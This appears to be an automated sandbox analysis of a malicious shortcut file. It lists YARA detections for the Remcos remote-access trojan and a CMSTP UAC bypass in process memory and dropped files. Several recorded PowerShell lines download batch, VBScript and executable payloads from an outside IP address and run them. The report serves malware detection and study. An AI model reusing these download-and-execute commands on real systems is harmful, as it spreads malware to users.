                      Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\AUGUST.exe
                      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: Dlr7HYI6VL.lnk LNK file: /c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD0D95 NtdllDefWindowProc_W,23_2_6FAD0D95
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FACE5F6 NtdllDefWindowProc_W,CallWindowProcW,23_2_6FACE5F6
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD2932 _memset,NtdllDefWindowProc_W,23_2_6FAD2932
                      Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\Tasks\lnfast_x64.job
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\demhwk 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\gps 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\qapuwvr 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: String function: 0040243B appears 37 times
                      Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA553BC appears 48 times
                      Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA550C9 appears 66 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6C5253BC appears 44 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD50C9 appears 58 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD53BC appears 45 times
                      Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engine Classification label: mal100.troj.expl.evad.winLNK@44/34@0/2
